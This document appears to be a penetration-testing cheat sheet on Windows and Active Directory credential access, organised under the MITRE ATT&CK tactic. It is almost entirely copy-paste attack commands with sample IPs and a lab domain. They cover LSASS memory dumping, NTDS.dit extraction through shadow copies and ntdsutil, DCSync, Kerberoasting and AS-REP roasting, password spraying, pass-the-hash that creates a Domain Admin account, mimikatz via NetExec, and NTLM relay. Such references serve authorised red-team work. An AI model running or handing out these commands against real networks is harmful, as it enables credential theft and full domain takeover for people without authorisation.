Credential Access
The adversary is trying to steal account names and passwords. https://attack.mitre.org/tactics/TA0006/
SecureString to Plaintext
$SecPass = "<SECURE PASS STRING>" | ConvertTo-SecureString;
(New-Object System.Management.Automation.PSCredential "N/A", $SecPass).GetNetworkCredential().Password;
Passwords in Description
ActiveDirectory
Module
Get-ADUser -Filter 'Description -like "*password*"' -Properties Description | select name,Description
Using PowerView.ps1
GitHub: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
Find-UserField -SearchField Description -SearchTerm "password"
Volume Shadow Creation
# creating volume shadow copy
wmic /node:"[AD_IP_address]" /user:"[username]" /password:"[password]" process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
# copying NTDS.dit, SYSTEM and SECURITY files from shadow copy
wmic /node:"[AD_IP_address]" /user:"[username]" /password:"[password]" process call create "cmd /c copy \\[shadow_copy_dir]\\Windows\\NTDS\\NTDS.dit [target_folder] & copy \\[shadow_copy_dir]\\Windows\\System32\\config\\SYSTEM [target_folder] & copy \\[shadow_copy_dir]\\Windows\\System32\\config\\SECURITY [target_folder]"
# compressing files for exfiltration
7za.exe a -mx3 nt.7z \\\\[AD_IP_address]\\c$\\[target_folder]
Stored Credential Enumeration
You can use cmdkey
command or the keymgr.dll
(requires GUI) to list out stored credentials. Additionally, you can use the output in a runas
command to authenticate.
Listing saved credentials:
cmdkey /list
Listing saved credentials in a desktop environment:
rundll32.exe keymgr.dll, KRShowKeyMgr
Using saved credentials:
runas /savecred /user:jmith cmd.exe
Dumping LSASS with rundll32.exe
rundll32.exe
Same behavior that would occur if you Right-Clicked
the process in Task Manager and dump LSASS manually.
.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full
Memory Dump with Get-StorageDiagnosticInfo
Get-StorageDiagnosticInfo
Source: https://x.com/0gtweet/status/1440255495797764108 https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo?view=windowsserver2019-ps
$fname = Get-StorageSubSystem | Select -Property FriendlyName
Get-StorageDiagnosticInfo -StorageSubSystemFriendlyName $fname -IncludeLiveDump -DestinationPath C:\
Mount VHD, pull SAM
guestmount --add GoldenWindows11x64.vhdx --inspector --ro -v /mnt
cd /mnt/Windows/System32/config
cp SAM SYSTEM /root && cd /root && guestunmount /mnt
secretsdump.py -sam /root/SAM -system /root/SYSTEM local
Targeted Kerberoasting with PowerSploit
Get-DomainUser 'victimuser' | Select serviceprincipalname
Set-DomainObject -Identity 'victimuser' -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}
# Obtain a kerberoast hash to crack
$User = Get-DomainUser 'victimuser'
$User | Get-DomainSPNTicket | fl
# Clear the SPNs of the target account
$User | Select serviceprincipalname
Set-DomainObject -Identity victimuser -Clear serviceprincipalname
Dumping NTDS with ntdsutil.exe
ntdsutil.exe
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
DSInternals
DSInternals found here: https://github.com/MichaelGrafnetter/DSInternals
DCSync with Get-ADReplAccount
Get-ADReplAccount
Credit to @Mastadon.
Get-ADReplAccount -Server <DC FQDN> -All | Where { $_.Enabled -eq $True} | Format-Custom -View PwDump | tee hashes.ntds ; if($?) {cat .\hashes.ntds | select-string -NotMatch '\$', '\$DUPLICATE', 'IWAM_', 'IUSR_', 'ASPNET', 'HelpAssistant', 'SUPPORT_', 'Guest', 'DefaultAccount', 'HealthMailbox' |%{$_.Line.Trim()} | ? {$_.Trim() -ne "" }| Sort | Get-Unique | Out-File -encoding ASCII hashes_sorted.txt}
Extracting from NTDS, SYSTEM, SECURITY
You may have to modify the following registry key:
HKLM\\System\\CurrentControlSet\\Control\\Lsa\\FipsAlgorithmPolicy and set "Enabled" to 0
Install-Module DSInternals;
Import-Module DSInternals;
$key = Get-BootKey -SystemHivePath '.\registry\SYSTEM';
Get-ADDBAccount -DistinguishedName 'CN=krbtgt,CN=Users,DC=burmat,DC=local' -DBPath '.\Active Directory\ntds.dit' -BootKey $key;
Extracting NTDS with ntdsutil.exe
ntdsutil.exe
C:\> ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\pentest
ifm: quit
ntdsutil: quit
Impacket
GetUserSPNs.py
Kerberoasting
GetUserSPNs.py -request -dc-ip 10.10.10.123 burmat.local/xsvc:S3cur3PW123
GetNPUsers.py
AS-REP Roasting - Attempt to get TGTs for users that have UF_DONT_REQUIRE_PREAUTH
set:
GetNPUsers.py -request -no-pass -dc-ip 10.10.10.123 burmat.local/ -usersfile users.txt
secretsdump.py
Using secretsdump to steal credentials.
Extracting Credentials Remotely
secretsdump.py -just-dc-ntlm burmat.local/administrator@10.10.10.123
Offline NTDS Cracking
secretsdump.py -ntds ./ntds.dit -system SYSTEM LOCAL -output dump.ntds -user-status
Resetting Credentials with smbpasswd.py
Reset a password if you have the credentials but it is expired. Useful if you have a hash and no pw, too.
smbpasswd -r 10.0.0.12 -U 'burmat'
NetExec
GitHub repo: https://github.com/Pennyw0rth/NetExec
Pass-the-Hash
Because hashes are just as good:
# create a user
nxc smb 10.10.10.123 -u 'administrator' -d 'burmat.local' -H 'd7452863d1e8e15241nn50ceb1ab9dfe' -x 'net user burmat Pwn3dPwn3d! /add /domain'
# add to domain admins
nxc smb 10.10.10.123 -u 'administrator' -d 'burmat.local' -H 'd7452863d1e8e15241nn50ceb1ab9dfe' -x 'net group "Domain Admins" /add burmat /domain'
SMB Password Spraying
Switch out usernames/passwords/targets with lists:
## to spray that Spring2024! and a list of users against a list of targets:
nxc smb 'targets.txt' -u 'users.txt' -p 'Spring2024!' -d 'burmat.local'
Dumping Remote PowerShell History
nxc smb 10.250.1.33 -u 'dev001' -p 'burmat123$' -d 'burmat.local' -M powershell_history
Extracting Credentials
## mimikatz module
nxc smb 10.10.10.123 -u 'administrator' -d 'burmat.local' -p 'S3cur3PW123' -M mimikatz -o COMMAND='privilege::debug'
## SAM database
nxc smb 10.10.10.123 -u 'administrator' -d 'burmat.local' -p 'S3cur3PW123' --sam
Relaying to DCSync
ntlmrelayx.py -t DCSYNC://172.16.1.200 -smb2support -debug
python3 dementor.py -d burmat.local -u jsmith -p 'S3cur3PASS123$' 10.10.1.141 172.16.1.23 -debug
Last updated